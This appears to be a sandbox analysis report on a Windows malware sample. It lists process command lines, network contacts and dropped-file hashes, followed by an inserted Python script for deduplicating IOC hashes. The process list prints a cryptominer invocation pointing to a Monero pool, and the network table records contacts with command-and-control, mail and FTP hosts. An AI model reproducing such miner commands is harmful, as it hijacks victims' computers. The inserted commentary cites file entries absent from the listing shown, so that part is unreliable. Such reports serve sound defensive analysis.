"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6372 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6480 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=6760 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=4984 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3468 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6560 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\ProgramData\WindowsTask\AppHost.exe
C:\ProgramData\WindowsTask\AppHost.exe -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] --donate-level=1 -p x -t4
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=2208 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=2216 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=5816 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=1492 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6956 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3048 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe" C:\Users\Admin\AppData\Local\Temp\Msd100m.dll
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 95.213.205.83:5655 | rms-server.tektonit.ru | tcp |
| US | 8.8.8.8:53 | 83.205.213.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | freemail.freehost.com.ua | udp |
| UA | 194.0.200.251:465 | freemail.freehost.com.ua | tcp |
| US | 8.8.8.8:53 | 251.200.0.194.in-addr.arpa | udp |
| RU | 194.67.198.139:21 | | tcp |
| US | 8.8.8.8:53 | 139.198.67.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kaen.progaming-cheats.ru | udp |
| UA | 185.13.5.48:80 | kaen.progaming-cheats.ru | tcp |
| US | 8.8.8.8:53 | 48.5.13.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.39:45700 | xmr.pool.minergate.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 104.21.76.57:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | 57.76.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 46.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.206:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 142.250.187.238:443 | consent.google.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| FR | 143.244.56.51:443 | www.dll-files.com | tcp |
| FR | 143.244.56.51:443 | www.dll-files.com | tcp |
| US | 8.8.8.8:53 | c.pubguru.net | udp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | tg1.aniview.com | udp |
| US | 104.18.11.207:443 | maxcdn.bootstrapcdn.com | tcp |
| BG | 18.165.61.75:443 | c.pubguru.net | tcp |
| GB | 142.250.200.42:443 | ajax.googleapis.com | tcp |
| GB | 142.250.200.42:443 | ajax.googleapis.com | tcp |
| GB | 2.21.189.169:443 | tg1.aniview.com | tcp |
| US | 104.18.11.207:443 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | player.avplayer.com | udp |
| US | 8.8.8.8:53 | feed.avplayer.com | udp |
| US | 8.8.8.8:53 | track1.aniview.com | udp |
| SE | 92.123.135.71:443 | feed.avplayer.com | tcp |
| US | 96.46.186.186:443 | track1.aniview.com | tcp |
| US | 2.20.12.70:443 | player.avplayer.com | tcp |
| US | 8.8.8.8:53 | a3.pubguru.net | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| DE | 3.126.156.194:443 | a3.pubguru.net | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| BE | 64.233.166.154:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 51.56.244.143.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.11.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.61.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.61.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.189.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.186.46.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.135.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | tcp |
| DE | 3.126.156.194:443 | a3.pubguru.net | tcp |
| DE | 3.126.156.194:443 | a3.pubguru.net | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| BE | 64.233.166.154:443 | stats.g.doubleclick.net | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | udp |
| US | 216.239.32.36:443 | region1.analytics.google.com | tcp |
| US | 2.20.12.70:443 | player.avplayer.com | tcp |
| US | 8.8.8.8:53 | player.aniview.com | udp |
| US | 8.8.8.8:53 | 194.156.126.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.166.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content1.avplayer.com | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| US | 2.20.12.70:443 | content1.avplayer.com | tcp |
| GB | 163.70.147.23:443 | connect.facebook.net | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 163.70.147.23:443 | connect.facebook.net | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | go1.aniview.com | udp |
| US | 172.240.45.81:443 | go1.aniview.com | tcp |
| US | 172.240.45.81:443 | go1.aniview.com | tcp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | tcp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | 23.147.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| GB | 163.70.147.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | secure.adnxs.com | udp |
| US | 8.8.8.8:53 | ssp.disqus.com | udp |
| US | 8.8.8.8:53 | u.openx.net | udp |
| US | 8.8.8.8:53 | ads.stickyadstv.com | udp |
| US | 8.8.8.8:53 | secure-assets.rubiconproject.com | udp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| NL | 185.89.210.141:443 | secure.adnxs.com | tcp |
| NL | 154.57.158.115:443 | ads.stickyadstv.com | tcp |
| NL | 154.57.158.115:443 | ads.stickyadstv.com | tcp |
| BE | 104.68.78.171:443 | secure-assets.rubiconproject.com | tcp |
| GB | 2.21.188.239:443 | ads.pubmatic.com | tcp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 34.194.118.113:443 | ssp.disqus.com | tcp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.147.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.45.240.172.in-addr.arpa | udp |
| US | 18.245.194.122:443 | c.amazon-adsystem.com | tcp |
| US | 34.98.64.218:443 | u.openx.net | tcp |
| US | 8.8.8.8:53 | eus.rubiconproject.com | udp |
| US | 8.8.8.8:53 | sync.aniview.com | udp |
| US | 18.245.194.122:443 | c.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| US | 96.46.186.182:443 | sync.aniview.com | tcp |
| US | 96.46.186.182:443 | sync.aniview.com | tcp |
| GB | 2.21.189.68:443 | eus.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| GB | 2.21.189.68:443 | eus.rubiconproject.com | tcp |
| US | 96.46.186.182:443 | sync.aniview.com | tcp |
| GB | 108.156.39.15:443 | config.aps.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | secure.cdn.fastclick.net | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 8.8.8.8:53 | cdn.browsiprod.com | udp |
| US | 8.8.8.8:53 | cdn.hadronid.net | udp |
| US | 8.8.8.8:53 | b1sync.zemanta.com | udp |
| BG | 18.244.86.194:443 | aax.amazon-adsystem.com | tcp |
| GB | 23.53.174.156:443 | secure.cdn.fastclick.net | tcp |
| GB | 23.53.174.156:443 | secure.cdn.fastclick.net | tcp |
| US | 50.31.142.95:443 | b1sync.zemanta.com | tcp |
| BG | 52.85.5.92:443 | cdn.browsiprod.com | tcp |
| FR | 18.155.129.34:443 | tags.crwdcntrl.net | tcp |
| US | 172.67.38.106:443 | cdn.id5-sync.com | tcp |
| US | 104.22.53.173:443 | cdn.hadronid.net | tcp |
| US | 8.8.8.8:53 | image6.pubmatic.com | udp |
| NL | 198.47.127.19:443 | image6.pubmatic.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | id.hadron.ad.gt | udp |
| IE | 52.211.142.73:443 | bcp.crwdcntrl.net | tcp |
| US | 172.67.23.234:443 | id.hadron.ad.gt | tcp |
| NL | 23.63.101.171:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | events.browsiprod.com | udp |
| US | 8.8.8.8:53 | yield-manager.browsiprod.com | udp |
| US | 44.238.197.96:443 | events.browsiprod.com | tcp |
| BG | 18.165.61.10:443 | yield-manager.browsiprod.com | tcp |
| US | 8.8.8.8:53 | proc.ad.cpe.dotomi.com | udp |
| US | 8.8.8.8:53 | 141.210.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.158.57.154.in-addr.arpa | udp |
Files
| SHA256 | 342b3de7f7c8dc779e373e027cfe29630ac3ee88b74d403369e3c5c00627d80d |
| SHA512 | a24565dfb66605efbef8b71ad812d5ffa8f45bfef165f73612bfcb8399ad5f4c55d0de41f17faeb5eab26881f8e7c61c130091318fce5b8a8ef02b11eccdb529 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | c9cb2975537cae7866c4e45a2a28a330 |
| SHA1 | 501f7657a1d34900f60effa76d03766075d17112 |
| SHA256 | 68d8706aaea8007daccaabf26a04de30642ed22c2246b4381ab8daf1cfb9996e |
| SHA512 | 8680091c6772a7216189f0c34e42fee6569105372043ebacd5d79a5e4c5e74460c3295614a610c31e3e0c02a3354b2fb7a491503bf5754df7e943ce2c4aa47f2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index
| MD5 | b6b42ec90907a3f9d7898e5b76b6e4cf |
| SHA1 | 2deecf0feb08d077068484014ab0a02283414df2 |
| SHA256 | 71a20eefd9cce1d0018da85180fc74f35ffc2ba56c1d83082ecca5b1202390d1 |
| SHA512 | 76a82baffa24e3fbc7107d3dc8d04e04eaba71317689382738f754271a226f117fe7ab1b5e6997e7f94cecb9d4bdea8a4f34ce0e057aa8ac2e59d97b30c710da |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | faa5d92c4dc5ee155f131fcbeaf95738 |
| SHA1 | 8f21c2a49f3bc3fd9e8bf690bcf58c611f23e437 |
| SHA256 | d5b4ffd9ff6edde4562766ecdda113f8677ef61629e842cbed4359994682350e |
| SHA512 | 9f75d747d2aca2c1847c48ecea753e24abed1df9f6508435660b1562f3c8628ab2bc7d040f946e0db96406d3b3678f782fce64fa2975c8c4bc8324ec1cf5d178 |
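The dropped-file listing above mixes two kinds of artifact: files the sample itself wrote (for example the archive under Downloads) and Chrome's own profile housekeeping (TransportSecurity, Network Persistent State, Preferences, cache entries), several of which appear more than once with different hashes because the browser rewrote them during the run. The following parser is an added example, not part of this report or of the sandbox's tooling: it reads the path-plus-table format used on this page, rejects digests whose length does not match the algorithm (a common copy/paste failure when hashes are moved into a blocklist), groups repeated paths so every observed SHA256 is kept, and separates browser-profile noise from candidate IOCs. The noise heuristic (treating writes under the Chrome User Data directory as low-signal) is an analyst assumption for this example; the sample listing embeds rows copied from the entries above, with some digest rows omitted for brevity.

```python
"""Parse a sandbox 'dropped files' listing into a deduplicated IOC set.

Added example for this report page, not the sandbox's own code. Input format:
a file path on one line, followed by rows of the form '| MD5 | <hex> |'.
"""
import re
from collections import defaultdict

# Expected hex digest lengths per algorithm; anything else is truncated or garbled.
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

ROW_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")

# Assumption for this example: writes under Chrome's profile directory are the
# browser's own housekeeping, not attacker payloads, so they are triaged as noise.
NOISE_PREFIXES = (
    "c:\\users\\admin\\appdata\\local\\google\\chrome\\user data\\",
)

# Rows copied from the listing on this page (SHA1/SHA512 omitted for two entries).
SAMPLE_LISTING = r"""
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 4d57596d1901b84879df3e430702f145 |
| SHA256 | 0c3bae37a8b6f90af6ed1bec83a7e5ef1f9d80a9eb058799c845f1e23a4c7127 |
C:\Users\Admin\Downloads\Msd100m_x86.zip
| MD5 | 56b5c81d3bb38d4291bee814d8a8de9a |
| SHA1 | 6a20b04c074ce03cf910657216272383c4f8badb |
| SHA256 | 3781de0bf1f084ac0e1d96b25bc67d01e4c75fe5efda4110eb592c7b10202a44 |
| SHA512 | c5121e934481cf11d126cf34bb77610a28b011917b45c561e6db1f9b015f02be9f701b0f3fdb9a0229cc7176c66795aa782f1db64a6ba4d08f87d2848f74e317 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 6b4dfa79cdea3a83d8d1f9af8f4a9a7e |
| SHA256 | adbe8fb67008375b4569daa4288ed909319e8c3e25d65486845812e4d65f4b44 |
"""


def parse_listing(text):
    """Return [(path, {alg: hex}), ...] in listing order.

    Raises ValueError for a hash row that precedes any path, or for a digest
    whose length does not match its algorithm.
    """
    entries = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m is None:
            # Any non-table line starts a new file entry.
            current = (line, {})
            entries.append(current)
            continue
        if current is None:
            raise ValueError("hash row before any file path: %r" % line)
        alg, digest = m.group(1), m.group(2).lower()
        if len(digest) != DIGEST_LEN[alg]:
            raise ValueError("%s for %s has %d hex chars, expected %d"
                             % (alg, current[0], len(digest), DIGEST_LEN[alg]))
        current[1][alg] = digest
    return entries


def listing_errors(text):
    """Return the validation error message for a listing, or None if it parses."""
    try:
        parse_listing(text)
    except ValueError as exc:
        return str(exc)
    return None


def is_noise(path):
    """True when the path falls under a browser-profile prefix (see assumption above)."""
    return path.lower().startswith(NOISE_PREFIXES)


def build_ioc_set(entries):
    """Group entries by path, keeping every distinct SHA256 seen for that path.

    Returns (iocs, noise): two dicts mapping path -> sorted list of SHA256 values.
    A path rewritten several times during the run therefore keeps all versions.
    """
    by_path = defaultdict(set)
    for path, digests in entries:
        if "SHA256" in digests:
            by_path[path].add(digests["SHA256"])
    iocs, noise = {}, {}
    for path, hashes in by_path.items():
        (noise if is_noise(path) else iocs)[path] = sorted(hashes)
    return iocs, noise


if __name__ == "__main__":
    found, skipped = build_ioc_set(parse_listing(SAMPLE_LISTING))
    for p, hs in found.items():
        print("IOC  ", p, *hs)
    for p, hs in skipped.items():
        print("noise", p, "(%d version(s) observed)" % len(hs))
```

Run stand-alone it reports the Downloads archive as the one candidate IOC and collapses the two TransportSecurity rewrites into a single noise entry with two observed hashes; feed it the full listing from the page to get the complete set. The length check is deliberately strict rather than silently skipping bad rows, because a truncated SHA256 that reaches a detection rule will never match anything and the mistake is invisible afterwards.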